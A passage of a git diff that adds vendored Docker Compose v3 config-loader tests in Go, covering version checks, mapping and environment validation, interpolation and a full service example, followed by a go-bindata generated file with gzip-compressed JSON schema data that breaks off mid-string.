+ 123: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key in services: 123") + + _, err = loadYAML(` +version: "3" +services: + foo: + image: busybox +networks: + default: + ipam: + config: + - 123: oh dear +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key in networks.default.ipam.config[0]: 123") + + _, err = loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: + 1: FOO +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "Non-string key in services.dict-env.environment: 1") +} + +func TestSupportedVersion(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + foo: + image: busybox +`) + assert.NoError(t, err) + + _, err = loadYAML(` +version: "3.0" +services: + foo: + image: busybox +`) + assert.NoError(t, err) +} + +func TestUnsupportedVersion(t *testing.T) { + _, err := loadYAML(` +version: "2" +services: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "version") + + _, err = loadYAML(` +version: "2.0" +services: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "version") +} + +func TestInvalidVersion(t *testing.T) { + _, err := loadYAML(` +version: 3 +services: + foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "version must be a string") +} + +func TestV1Unsupported(t *testing.T) { + _, err := loadYAML(` +foo: + image: busybox +`) + assert.Error(t, err) +} + +func TestNonMappingObject(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + - foo: + image: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services must be a mapping") + + _, err = loadYAML(` +version: "3" +services: + foo: busybox +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.foo must be a mapping") + + _, err = loadYAML(` +version: "3" +networks: + - default: + driver: bridge +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "networks must be a mapping") + + _, err = loadYAML(` +version: "3" +networks: + default: bridge +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "networks.default must be a mapping") + + _, err = loadYAML(` +version: "3" +volumes: + - data: + driver: local +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "volumes must be a mapping") + + _, err = loadYAML(` +version: "3" +volumes: + data: local +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "volumes.data must be a mapping") +} + +func TestNonStringImage(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + foo: + image: ["busybox", "latest"] +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.foo.image must be a string") +} + +func TestValidEnvironment(t *testing.T) { + config, err := loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: + FOO: "1" + BAR: 2 + BAZ: 2.5 + QUUX: + list-env: + image: busybox + environment: + - FOO=1 + - BAR=2 + - BAZ=2.5 + - QUUX= +`) + assert.NoError(t, err) + + expected := map[string]string{ + "FOO": "1", + "BAR": "2", + "BAZ": "2.5", + "QUUX": "", + } + + assert.Equal(t, 2, len(config.Services)) + + for _, service := range config.Services { + assert.Equal(t, expected, service.Environment) + } +} + +func TestInvalidEnvironmentValue(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: + FOO: ["1"] +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.dict-env.environment.FOO must be a string, number or null") +} + +func TestInvalidEnvironmentObject(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + dict-env: + image: busybox + environment: "FOO=1" +`) + assert.Error(t, err) + assert.Contains(t, err.Error(), "services.dict-env.environment must be a mapping") +} + +func TestEnvironmentInterpolation(t *testing.T) { + config, err := loadYAML(` +version: "3" +services: + test: + image: busybox + labels: + - home1=$HOME + - home2=${HOME} + - nonexistent=$NONEXISTENT + - default=${NONEXISTENT-default} +networks: + test: + driver: $HOME +volumes: + test: + driver: $HOME +`) + + assert.NoError(t, err) + + home := os.Getenv("HOME") + + expectedLabels := map[string]string{ + "home1": home, + "home2": home, + "nonexistent": "", + "default": "default", + } + + assert.Equal(t, expectedLabels, config.Services[0].Labels) + assert.Equal(t, home, config.Networks["test"].Driver) + assert.Equal(t, home, config.Volumes["test"].Driver) +} + +func TestUnsupportedProperties(t *testing.T) { + dict, err := ParseYAML([]byte(` +version: "3" +services: + web: + image: web + build: ./web + links: + - bar + db: + image: db + build: ./db +`)) + assert.NoError(t, err) + + configDetails := buildConfigDetails(dict) + + _, err = Load(configDetails) + assert.NoError(t, err) + + unsupported := GetUnsupportedProperties(configDetails) + assert.Equal(t, []string{"build", "links"}, unsupported) +} + +func TestDeprecatedProperties(t *testing.T) { + dict, err := ParseYAML([]byte(` +version: "3" +services: + web: + image: web + container_name: web + db: + image: db + container_name: db + expose: ["5434"] +`)) + assert.NoError(t, err) + + configDetails := buildConfigDetails(dict) + + _, err = Load(configDetails) + assert.NoError(t, err) + + deprecated := GetDeprecatedProperties(configDetails) + assert.Equal(t, 2, len(deprecated)) + assert.Contains(t, deprecated, "container_name") + assert.Contains(t, deprecated, "expose") +} + +func TestForbiddenProperties(t *testing.T) { + _, err := loadYAML(` +version: "3" +services: + foo: + image: busybox + volumes: + - /data + volume_driver: some-driver + bar: + extends: + service: foo +`) + + assert.Error(t, err) + assert.IsType(t, &ForbiddenPropertiesError{}, err) + fmt.Println(err) + forbidden := err.(*ForbiddenPropertiesError).Properties + + assert.Equal(t, 2, len(forbidden)) + assert.Contains(t, forbidden, "volume_driver") + assert.Contains(t, forbidden, "extends") +} + +func durationPtr(value time.Duration) *time.Duration { + return &value +} + +func int64Ptr(value int64) *int64 { + return &value +} + +func uint64Ptr(value uint64) *uint64 { + return &value +} + +func TestFullExample(t *testing.T) { + bytes, err := ioutil.ReadFile("full-example.yml") + assert.NoError(t, err) + + config, err := loadYAML(string(bytes)) + if !assert.NoError(t, err) { + return + } + + workingDir, err := os.Getwd() + assert.NoError(t, err) + + homeDir := os.Getenv("HOME") + stopGracePeriod := time.Duration(20 * time.Second) + + expectedServiceConfig := types.ServiceConfig{ + Name: "foo", + + CapAdd: []string{"ALL"}, + CapDrop: []string{"NET_ADMIN", "SYS_ADMIN"}, + CgroupParent: "m-executor-abcd", + Command: []string{"bundle", "exec", "thin", "-p", "3000"}, + ContainerName: "my-web-container", + DependsOn: []string{"db", "redis"}, + Deploy: types.DeployConfig{ + Mode: "replicated", + Replicas: uint64Ptr(6), + Labels: map[string]string{"FOO": "BAR"}, + UpdateConfig: &types.UpdateConfig{ + Parallelism: uint64Ptr(3), + Delay: time.Duration(10 * time.Second), + FailureAction: "continue", + Monitor: time.Duration(60 * time.Second), + MaxFailureRatio: 0.3, + }, + Resources: types.Resources{ + Limits: &types.Resource{ + NanoCPUs: "0.001", + MemoryBytes: 50 * 1024 * 1024, + }, + Reservations: &types.Resource{ + NanoCPUs: "0.0001", + MemoryBytes: 20 * 1024 * 1024, + }, + }, + RestartPolicy: &types.RestartPolicy{ + Condition: "on_failure", + Delay: durationPtr(5 * time.Second), + MaxAttempts: uint64Ptr(3), + Window: durationPtr(2 * time.Minute), + }, + Placement: types.Placement{ + Constraints: []string{"node=foo"}, + }, + }, + Devices: []string{"/dev/ttyUSB0:/dev/ttyUSB0"}, + DNS: []string{"8.8.8.8", "9.9.9.9"}, + DNSSearch: []string{"dc1.example.com", "dc2.example.com"}, + DomainName: "foo.com", + Entrypoint: []string{"/code/entrypoint.sh", "-p", "3000"}, + Environment: map[string]string{ + "RACK_ENV": "development", + "SHOW": "true", + "SESSION_SECRET": "", + "FOO": "1", + "BAR": "2", + "BAZ": "3", + }, + Expose: []string{"3000", "8000"}, + ExternalLinks: []string{ + "redis_1", + "project_db_1:mysql", + "project_db_1:postgresql", + }, + ExtraHosts: map[string]string{ + "otherhost": "50.31.209.229", + "somehost": "162.242.195.82", + }, + HealthCheck: &types.HealthCheckConfig{ + Test: []string{ + "CMD-SHELL", + "echo \"hello world\"", + }, + Interval: "10s", + Timeout: "1s", + Retries: uint64Ptr(5), + }, + Hostname: "foo", + Image: "redis", + Ipc: "host", + Labels: map[string]string{ + "com.example.description": "Accounting webapp", + "com.example.number": "42", + "com.example.empty-label": "", + }, + Links: []string{ + "db", + "db:database", + "redis", + }, + Logging: &types.LoggingConfig{ + Driver: "syslog", + Options: map[string]string{ + "syslog-address": "tcp://192.168.0.42:123", + }, + }, + MacAddress: "02:42:ac:11:65:43", + NetworkMode: "container:0cfeab0f748b9a743dc3da582046357c6ef497631c1a016d28d2bf9b4f899f7b", + Networks: map[string]*types.ServiceNetworkConfig{ + "some-network": { + Aliases: []string{"alias1", "alias3"}, + Ipv4Address: "", + Ipv6Address: "", + }, + "other-network": { + Ipv4Address: "172.16.238.10", + Ipv6Address: "2001:3984:3989::10", + }, + "other-other-network": nil, + }, + Pid: "host", + Ports: []string{ + "3000", + "3000-3005", + "8000:8000", + "9090-9091:8080-8081", + "49100:22", + "127.0.0.1:8001:8001", + "127.0.0.1:5000-5010:5000-5010", + }, + Privileged: true, + ReadOnly: true, + Restart: "always", + SecurityOpt: []string{ + "label=level:s0:c100,c200", + "label=type:svirt_apache_t", + }, + StdinOpen: true, + StopSignal: "SIGUSR1", + StopGracePeriod: &stopGracePeriod, + Tmpfs: []string{"/run", "/tmp"}, + Tty: true, + Ulimits: map[string]*types.UlimitsConfig{ + "nproc": { + Single: 65535, + }, + "nofile": { + Soft: 20000, + Hard: 40000, + }, + }, + User: "someone", + Volumes: []string{ + "/var/lib/mysql", + "/opt/data:/var/lib/mysql", + fmt.Sprintf("%s:/code", workingDir), + fmt.Sprintf("%s/static:/var/www/html", workingDir), + fmt.Sprintf("%s/configs:/etc/configs/:ro", homeDir), + "datavolume:/var/lib/mysql", + }, + WorkingDir: "/code", + } + + assert.Equal(t, []types.ServiceConfig{expectedServiceConfig}, config.Services) + + expectedNetworkConfig := map[string]types.NetworkConfig{ + "some-network": {}, + + "other-network": { + Driver: "overlay", + DriverOpts: map[string]string{ + "foo": "bar", + "baz": "1", + }, + Ipam: types.IPAMConfig{ + Driver: "overlay", + Config: []*types.IPAMPool{ + {Subnet: "172.16.238.0/24"}, + {Subnet: "2001:3984:3989::/64"}, + }, + }, + }, + + "external-network": { + External: types.External{ + Name: "external-network", + External: true, + }, + }, + + "other-external-network": { + External: types.External{ + Name: "my-cool-network", + External: true, + }, + }, + } + + assert.Equal(t, expectedNetworkConfig, config.Networks) + + expectedVolumeConfig := map[string]types.VolumeConfig{ + "some-volume": {}, + "other-volume": { + Driver: "flocker", + DriverOpts: map[string]string{ + "foo": "bar", + "baz": "1", + }, + }, + "external-volume": { + External: types.External{ + Name: "external-volume", + External: true, + }, + }, + "other-external-volume": { + External: types.External{ + Name: "my-cool-volume", + External: true, + }, + }, + } + + assert.Equal(t, expectedVolumeConfig, config.Volumes) +} + +func loadYAML(yaml string) (*types.Config, error) { + dict, err := ParseYAML([]byte(yaml)) + if err != nil { + return nil, err + } + + return Load(buildConfigDetails(dict)) +} + +func serviceSort(services []types.ServiceConfig) []types.ServiceConfig { + sort.Sort(servicesByName(services)) + return services +} + +type servicesByName []types.ServiceConfig + +func (sbn servicesByName) Len() int { return len(sbn) } +func (sbn servicesByName) Swap(i, j int) { sbn[i], sbn[j] = sbn[j], sbn[i] } +func (sbn servicesByName) Less(i, j int) bool { return sbn[i].Name < sbn[j].Name } diff --git a/vendor/github.com/docker/docker/cli/compose/schema/bindata.go b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go new file mode 100644 index 0000000000..9486e91ae0 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/schema/bindata.go @@ -0,0 +1,260 @@ +// Code generated by go-bindata. +// sources: +// data/config_schema_v3.0.json +// data/config_schema_v3.1.json +// DO NOT EDIT! + +package schema + +import ( + "bytes" + "compress/gzip" + "fmt" + "io" + "io/ioutil" + "os" + "path/filepath" + "strings" + "time" +) + +func bindataRead(data []byte, name string) ([]byte, error) { + gz, err := gzip.NewReader(bytes.NewBuffer(data)) + if err != nil { + return nil, fmt.Errorf("Read %q: %v", name, err) + } + + var buf bytes.Buffer + _, err = io.Copy(&buf, gz) + clErr := gz.Close() + + if err != nil { + return nil, fmt.Errorf("Read %q: %v", name, err) + } + if clErr != nil { + return nil, err + } + + return buf.Bytes(), nil +} + +type asset struct { + bytes []byte + info os.FileInfo +} + +type bindataFileInfo struct { + name string + size int64 + mode os.FileMode + modTime time.Time +} + +func (fi bindataFileInfo) Name() string { + return fi.name +} +func (fi bindataFileInfo) Size() int64 { + return fi.size +} +func (fi bindataFileInfo) Mode() os.FileMode { + return fi.mode +} +func (fi bindataFileInfo) ModTime() time.Time { + return fi.modTime +} +func (fi bindataFileInfo) IsDir() bool { + return false +} +func (fi bindataFileInfo) Sys() interface{} { + return nil +} + +var _dataConfig_schema_v30Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x5a\x4f\x8f\xdb\xb8\x0e\xbf\xe7\x53\x18\x6e\x6f\xcd\xcc\x14\x78\xc5\x03\x5e\x6f\xef\xb8\xa7\xdd\xf3\x0e\x5c\x43\xb1\x99\x44\x1d\x59\x52\x29\x39\x9d\xb4\xc8\x77\x5f\xc8\xff\x22\x2b\x92\xe5\x24\xee\xb6\x87\x9e\x66\x62\x91\x14\xff\xe9\x47\x8a\xf6\xf7\x55\x92\xa4\x6f\x55\xb1\x87\x8a\xa4\x1f\x93\x74\xaf\xb5\xfc\xf8\xf4\xf4\x59\x09\xfe\xd0\x3e\x7d\x14\xb8\x7b\x2a\x91\x6c\xf5\xc3\xfb\x0f\x4f\xed\xb3\x37\xe9\xda\xf0\xd1\xd2\xb0\x14\x82\x6f\xe9\x2e\x6f\x57\xf2\xc3\x7f\x1e\xdf\x3f\x1a\xf6\x96\x44\x1f\x25\x18\x22\xb1\xf9\x0c\x85\x6e\x9f\x21\x7c\xa9\x29\x82\x61\x7e\x4e\x0f\x80\x8a\x0a\x9e\x66\xeb\x95\x59\x93\x28\x24\xa0\xa6\xa0\xd2\x8f\x89\x51\x2e\x49\x06\x92\xfe\x81\x25\x56\x69\xa4\x7c\x97\x36\x8f\x4f\x8d\x84\x24\x49\x15\xe0\x81\x16\x96\x84\x41\xd5\x37\x4f\x67\xf9\x4f\x03\xd9\xda\x95\x6a\x29\xdb\x3c\x97\x44\x6b\x40\xfe\xd7\xa5\x6e\xcd\xf2\xa7\x67\xf2\xf0\xed\xff\x0f\x7f\xbf\x7f\xf8\xdf\x63\xfe\x90\xbd\x7b\x3b\x5a\x36\xfe\x45\xd8\xb6\xdb\x97\xb0\xa5\x9c\x6a\x2a\xf8\xb0\x7f\x3a\x50\x9e\xba\xff\x4e\xc3\xc6\xa4\x2c\x1b\x62\xc2\x46\x7b\x6f\x09\x53\x30\xb6\x99\x83\xfe\x2a\xf0\x25\x66\xf3\x40\xf6\x93\x6c\xee\xf6\xf7\xd8\x3c\x36\xe7\x20\x58\x5d\x45\x23\xd8\x53\xfd\x24\x63\xda\xed\xef\x8b\xdf\xaa\x37\x7a\x92\xb6\xa5\xb0\xf6\x6e\x14\x1c\x65\xbb\xcf\x55\xbe\x6c\x0b\xfb\x6a\x70\x56\xc0\x4b\x25\x48\x26\x8e\xe6\x59\xc0\x1f\x2d\x41\x05\x5c\xa7\x83\x0b\x92\x24\xdd\xd4\x94\x95\xae\x47\x05\x87\x3f\x8d\x88\x67\xeb\x61\x92\x7c\x77\x0f\xb6\x25\xa7\x59\x1f\xfd\x0a\x07\x7c\x58\x0f\xd8\x32\xac\x17\x82\x6b\x78\xd5\x8d\x51\xd3\x5b\xb7\x2e\x10\xc5\x0b\xe0\x96\x32\x98\xcb\x41\x70\xa7\x26\x5c\xc6\xa8\xd2\xb9\xc0\xbc\xa4\x85\x4e\x4f\x0e\xfb\x85\xbc\x78\x3e\x0d\xac\xd6\xaf\x6c\xe5\x11\x98\x16\x44\xe6\xa4\x2c\x47\x76\x10\x44\x72\x4c\xd7\x49\x4a\x35\x54\xca\x6f\x62\x92\xd6\x9c\x7e\xa9\xe1\x8f\x8e\x44\x63\x0d\xae\xdc\x12\x85\x5c\x5e\xf0\x0e\x45\x2d\x73\x49\xd0\x24\xd8\xb4\xfb\xd3\x42\x54\x15\xe1\x4b\x65\xdd\x35\x76\xcc\xf0\xbc\xe0\x9a\x50\x0e\x98\x73\x52\xc5\x12\xc9\x9c\x3a\xe0\xa5\xca\xdb\xfa\x37\x99\x46\xdb\xbc\xe5\x57\x8e\x80\xa1\x18\x2e\x1a\x8f\x92\x4f\x25\x76\x2b\xc6\xa4\xb6\xd1\x2d\x75\x18\x73\x05\x04\x8b\xfd\x8d\xfc\xa2\x22\x94\xcf\xf1\x1d\x70\x8d\x47\x29\x68\x9b\x2f\xbf\x5c\x22\x00\x3f\xe4\x03\x96\x5c\xed\x06\xe0\x07\x8a\x82\x57\xfd\x69\x98\x03\x30\x03\xc8\x1b\xfe\x57\x29\x14\xb8\x8e\x71\x0c\xb4\x97\x06\x53\x47\x3e\xe9\x39\x9e\x7b\xc3\xd7\x49\xca\xeb\x6a\x03\x68\x5a\xba\x11\xe5\x56\x60\x45\x8c\xb2\xfd\xde\xd6\xf2\xc8\xd3\x9e\xcc\xb3\x1d\x68\xdb\x60\xca\x3a\x61\x39\xa3\xfc\x65\xf9\x14\x87\x57\x8d\x24\xdf\x0b\xa5\xe7\x63\xb8\xc5\xbe\x07\xc2\xf4\xbe\xd8\x43\xf1\x32\xc1\x6e\x53\x8d\xb8\x85\xd2\x73\x92\x9c\x56\x64\x17\x27\x92\x45\x8c\x84\x91\x0d\xb0\x9b\xec\x5c\xd4\xf9\x96\x58\xb1\xdb\x19\xd2\x50\xc6\x5d\x74\x2e\xdd\x72\xac\xe6\x97\x48\x0f\x80\x73\x0b\xb8\x90\xe7\x86\xcb\x5d\x8c\x37\x20\x49\xbc\xfb\x1c\x91\x7e\x7a\x6c\x9b\xcf\x89\x53\xd5\xfc\xc7\x58\x9a\xb9\xed\x42\xe2\xd4\x7d\xdf\x13\xc7\xc2\x79\x0d\xc5\x28\x2a\x15\x29\x4c\xdf\x80\xa0\x02\x71\x3d\x93\x76\xcd\x7e\x5e\x89\x32\x94\xa0\x17\xc4\xae\x6f\x82\x48\x7d\x75\x21\x4c\x6e\xea\x1f\x67\x85\x2e\x7a\x81\x88\x58\x13\x52\x6f\xae\x9a\x67\x75\xe3\x29\xd6\xd0\x11\x46\x89\x82\xf8\x61\x0f\x3a\x72\x24\x8d\xca\xc3\x87\x99\x39\xe1\xe3\xfd\xef\x24\x6f\x80\x35\x28\x73\x7e\x8f\x1c\x11\x75\x56\xa5\x39\x6e\x3e\x45\xb2\xc8\x69\xfb\xc1\x2d\xbc\xa4\x65\x18\x2b\x1a\x84\xb0\x0f\x98\x14\xa8\x2f\x4e\xd7\xbf\x53\xee\xdb\xad\xef\xae\xf6\x12\xe9\x81\x32\xd8\xc1\xf8\xd6\xb2\x11\x82\x01\xe1\x23\xe8\x41\x20\x65\x2e\x38\x3b\xce\xa0\x54\x9a\x60\xf4\x42\xa1\xa0\xa8\x91\xea\x63\x2e\xa4\x5e\xbc\xcf\x50\xfb\x2a\x57\xf4\x1b\x8c\xa3\x79\xc6\xfb\x4e\x50\x36\xe2\x39\xaa\x42\xdf\x56\xaf\x95\x2e\x29\xcf\x85\x04\x1e\xf5\x8e\xd2\x42\xe6\x3b\x24\x05\xe4\x12\x90\x8a\xd2\x67\xe0\xda\x8e\x75\x59\x23\x31\xfb\x5f\x8a\x51\x74\xc7\x09\x8b\x39\x5a\x57\x72\x7b\xe3\xc5\x42\xeb\x78\xb8\x6b\x46\x2b\x1a\x3e\x07\x1e\x80\x9d\x51\x03\x5a\xfc\xf7\xc3\xfe\x04\xe4\x9f\x35\xa5\x5c\xc3\x0e\xd0\x87\x94\x13\x5d\xc7\x74\xd3\x31\xa3\xdb\xd8\x13\x1c\x07\x74\x42\x8f\x86\x41\x89\xad\xf6\x33\xf8\x7a\x11\xaf\x5e\xa3\xe1\x6f\x23\x6f\xdd\x29\x92\x79\xe9\xaf\x82\x73\x57\x8d\x2c\x88\xa8\x27\x2f\xa2\xd6\x2a\xda\x18\x36\x34\x5c\x4d\x35\x35\x03\xa9\x35\xc5\x5c\x14\x2f\x4c\xa3\x64\x0e\x41\x49\xfd\xda\xae\x1c\xcb\xae\x98\x23\x3b\x77\x96\x5e\x80\x6f\xa2\x68\x93\x46\x27\xb0\xd3\xd3\xcd\x8e\x28\x38\x79\xa4\x8a\x6c\x9c\x99\x9b\xef\x70\x9b\x6c\xc4\x43\x1c\x63\x10\x34\x52\x27\x2e\x1d\xda\x8e\xf0\x04\xd4\xaf\x39\x38\xd0\xb4\x02\x51\xfb\x6b\xd6\xca\xce\xef\x8e\x29\xb5\x26\xb3\x91\xa0\x5a\x94\x6e\x4c\x9f\x87\xa0\xf6\xfd\x45\x34\x70\x73\x0e\x09\x82\x64\xb4\x20\x2a\x06\x44\x77\x5c\x50\x6b\x59\x12\x0d\x79\xfb\xa2\xea\x2a\xe8\x9f\xc0\x7c\x49\x90\x30\x06\x8c\xaa\x6a\x0e\x86\xa6\x25\x30\x72\xbc\xa9\x7c\x36\xec\x5b\x42\x59\x8d\x90\x93\x42\x77\xef\xc2\x22\x39\x97\x56\x82\x53\x2d\xbc\x08\x31\x6f\xcb\x8a\xbc\xe6\xfd\xb6\x0d\x89\xf7\xc0\x04\xdb\xba\xb9\x77\x4b\x2b\x13\x94\xa8\xb1\xb8\x70\xf6\xcd\x21\x3a\xd7\xfa\x40\xc6\xf4\x3b\x5e\x98\x8e\xa0\x0c\x92\x0c\x57\xff\x28\x7f\xb4\xb4\x74\x7d\x66\x2e\x05\xa3\xc5\x71\x29\x0b\x0b\xc1\x5b\x27\xcf\x49\x88\x3b\x33\xd0\xa4\x83\x69\x85\x2a\xa9\xa3\x87\xb5\x61\xf8\x4a\x79\x29\xbe\x5e\xb1\xe1\x72\xa9\x24\x19\x29\xc0\xc1\xbb\x7b\x1d\xad\x34\x12\xca\xf5\xd5\xe5\xfc\x5e\xb3\xee\xa8\xe6\x43\x7e\x46\x50\x7f\xa0\x8b\xbf\x49\x0d\x20\x7d\x21\xeb\xe8\x3c\xa8\x82\x4a\xa0\x37\x01\x17\x78\xf3\x1d\x33\xb1\x27\x5b\xa0\xaa\xcd\x1a\x20\x76\x54\xe6\xbe\xb8\xf8\x6d\x23\x3e\x24\xcc\xe2\x80\x44\x25\xa9\x96\x3a\x1d\xb3\x47\xaa\xa9\xb7\x06\x27\xd3\xa3\x88\x24\x3c\x8e\x88\x69\x1d\xd7\xbd\xa3\x50\xf5\x86\xc3\x64\x47\x65\xf9\xd3\xf7\x9e\x77\xfe\x35\xe5\x14\xbe\x94\xdc\x07\x7a\xfd\xdb\x90\x40\x54\x9f\x87\x9e\x79\x3d\xf8\x2a\x9b\x1d\xe2\xe0\xab\x88\xe5\xf4\xbf\xb2\xc1\xbb\x03\x33\xba\x2f\x37\x22\x90\xd1\x51\xfd\x46\x8c\xdf\xf9\x75\x65\x7e\x39\x43\x2a\x2b\xcf\x2e\xef\x8f\x53\x29\x31\x7b\x3a\xdf\x71\x64\x63\x35\x5c\x32\xcf\x07\x74\x63\xb4\x9d\x1a\x4a\xf4\x24\x81\x69\xad\xb3\x69\xe7\xc4\x69\xcb\x17\xcc\xf0\xc7\x77\x13\x35\x65\xea\x2d\xda\x0f\x02\xe3\x05\x06\x3e\xfe\x98\x3a\x8d\x68\xef\xdd\xcb\xaf\xc0\x02\xa0\x66\xf1\x5f\x7c\x13\x66\xec\xe4\xc7\x8b\xf9\xc6\xf7\xf1\xd0\xae\xfd\x9e\x2b\x1b\xf9\xc7\x21\x69\xdf\x49\x5b\x90\x92\xd9\xbd\x79\x28\x8c\xde\x2f\xc5\xdc\x91\x61\xff\xc5\x56\xe6\x87\xab\x95\xfd\xb7\xf9\xba\x6e\x75\x5a\xfd\x13\x00\x00\xff\xff\x46\xf7\x7b\x23\xe5\x2a\x00\x00") + +func dataConfig_schema_v30JsonBytes() ([]byte, error) { + return bindataRead( + _dataConfig_schema_v30Json, + "data/config_schema_v3.0.json", + ) +} + +func dataConfig_schema_v30Json() (*asset, error) { + bytes, err := dataConfig_schema_v30JsonBytes() + if err != nil { + return nil, err + } + + info := bindataFileInfo{name: "data/config_schema_v3.0.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} + a := &asset{bytes: bytes, info: info} + return a, nil +} + +var _dataConfig_schema_v31Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x1a\xcb\x8e\xdb\x36\xf0\xee\xaf\x10\x94\xdc\xe2\xdd\x4d\xd1\xa0\x40\x73\xeb\xb1\xa7\xf6\xdc\x85\x23\xd0\xd2\x58\x66\x96\x22\x19\x92\x72\xd6\x09\xfc\xef\x05\xf5\x32\x45\x91\x22\x6d\x2b\xd9\x45\xd1\xd3\xae\xc5\x99\xe1\xbc\x67\x38\xe4\xf7\x55\x92\xa4\x6f\x65\xbe\x87\x0a\xa5\x1f\x93\x74\xaf\x14\xff\xf8\xf0\xf0\x59\x32\x7a\xd7\x7e\xbd\x67\xa2\x7c\x28\x04\xda\xa9\xbb\xf7\x1f\x1e\xda\x6f\x6f\xd2\xb5\xc6\xc3\x85\x46\xc9\x19\xdd\xe1\x32\x6b\x57\xb2\xc3\xaf\xf7\xbf\xdc\x6b\xf4\x16\x44\x1d\x39\x68\x20\xb6\xfd\x0c\xb9\x6a\xbf\x09\xf8\x52\x63\x01\x1a\xf9\x31\x3d\x80\x90\x98\xd1\x74\xb3\x5e\xe9\x35\x2e\x18\x07\xa1\x30\xc8\xf4\x63\xa2\x99\x4b\x92\x01\xa4\xff\x60\x90\x95\x4a\x60\x5a\xa6\xcd\xe7\x53\x43\x21\x49\x52\x09\xe2\x80\x73\x83\xc2\xc0\xea\x9b\x87\x33\xfd\x87\x01\x6c\x6d\x53\x35\x98\x6d\xbe\x73\xa4\x14\x08\xfa\xf7\x94\xb7\x66\xf9\xd3\x23\xba\xfb\xf6\xc7\xdd\x3f\xef\xef\x7e\xbf\xcf\xee\x36\xef\xde\x8e\x96\xb5\x7e\x05\xec\xda\xed\x0b\xd8\x61\x8a\x15\x66\x74\xd8\x3f\x1d\x20\x4f\xdd\x7f\xa7\x61\x63\x54\x14\x0d\x30\x22\xa3\xbd\x77\x88\x48\x18\xcb\x4c\x41\x7d\x65\xe2\x29\x24\xf3\x00\xf6\x42\x32\x77\xfb\x3b\x64\x1e\x8b\x73\x60\xa4\xae\x82\x16\xec\xa1\x5e\x48\x98\x76\xfb\x65\xec\x27\x21\x17\xa0\xc2\x2e\xdb\x42\xbd\x98\xc7\xea\xed\x6f\x13\x78\xd5\x0b\x3d\x0b\xdb\x42\x18\x7b\x37\x0c\x8e\xc2\xdb\xa5\x2a\x57\x78\xf9\x75\x35\x28\xcb\xa3\xa5\x02\x38\x61\x47\xfd\xcd\xa3\x8f\x16\xa0\x02\xaa\xd2\x41\x05\x49\x92\x6e\x6b\x4c\x0a\x5b\xa3\x8c\xc2\x5f\x9a\xc4\xa3\xf1\x31\x49\xbe\xdb\x99\xcc\xa0\xd3\xac\x8f\x7e\xf9\x0d\x3e\xac\x7b\x64\x19\xd6\x73\x46\x15\x3c\xab\x46\xa8\xf9\xad\x5b\x15\xb0\xfc\x09\xc4\x0e\x13\x88\xc5\x40\xa2\x94\x33\x2a\x23\x58\xaa\x8c\x89\xac\xc0\xb9\x4a\x4f\x16\xfa\x84\x5e\xd8\x9f\x06\x54\xe3\xd7\x66\xe5\x20\x98\xe6\x88\x67\xa8\x28\x46\x72\x20\x21\xd0\x31\x5d\x27\x29\x56\x50\x49\xb7\x88\x49\x5a\x53\xfc\xa5\x86\x3f\x3b\x10\x25\x6a\xb0\xe9\x16\x82\xf1\xe5\x09\x97\x82\xd5\x3c\xe3\x48\x68\x07\x9b\x57\x7f\x9a\xb3\xaa\x42\x74\x29\xaf\xbb\x44\x8e\x08\xcd\x33\xaa\x10\xa6\x20\x32\x8a\xaa\x90\x23\xe9\xa8\x03\x5a\xc8\xac\x2d\xf8\xb3\x6e\xb4\xcb\x5a\x7c\x69\x11\x18\xaa\xff\xa2\xf6\x28\xe8\x9c\x63\xb7\x64\xb4\x6b\x6b\xde\x52\x0b\x31\x93\x80\x44\xbe\xbf\x12\x9f\x55\x08\xd3\x18\xdd\x01\x55\xe2\xc8\x19\x6e\xfd\xe5\xd5\x39\x02\xd0\x43\x36\xe4\x92\x8b\xd5\x00\xf4\x80\x05\xa3\x55\x1f\x0d\x31\x09\x66\x48\xf2\x1a\xff\x99\x33\x09\xb6\x62\x2c\x01\xcd\xa5\x41\xd4\x91\x4e\x7a\x8c\xc7\x5e\xf0\x75\x92\xd2\xba\xda\x82\xd0\x3d\xec\x08\x72\xc7\x44\x85\x34\xb3\xfd\xde\xc6\xf2\x48\xd3\x0e\xcf\x33\x15\x68\xca\xa0\xcb\x3a\x22\x19\xc1\xf4\x69\x79\x17\x87\x67\x25\x50\xb6\x67\x52\xc5\xe7\x70\x03\x7d\x0f\x88\xa8\x7d\xbe\x87\xfc\x69\x06\xdd\x84\x1a\x61\x33\xa9\x62\x9c\x1c\x57\xa8\x0c\x03\xf1\x3c\x04\x42\xd0\x16\xc8\x55\x72\x2e\xaa\x7c\x83\x2c\x2b\x4b\x0d\xea\xf3\xb8\x49\xe7\xd2\x2d\x87\x6a\x7e\x21\xf0\x01\x44\x6c\x01\x67\xfc\xdc\x70\xd9\x8b\xe1\x06\x24\x09\x77\x9f\x23\xd0\x4f\xf7\x6d\xf3\x39\x13\x55\xcd\x7f\x84\xa4\x1b\xbb\x5d\x48\xac\xba\xef\xfa\x62\x49\x18\xd7\x50\x8c\xac\x52\xa1\x5c\xf7\x0d\x02\xa4\xc7\xae\x67\xd0\xee\x74\x93\x5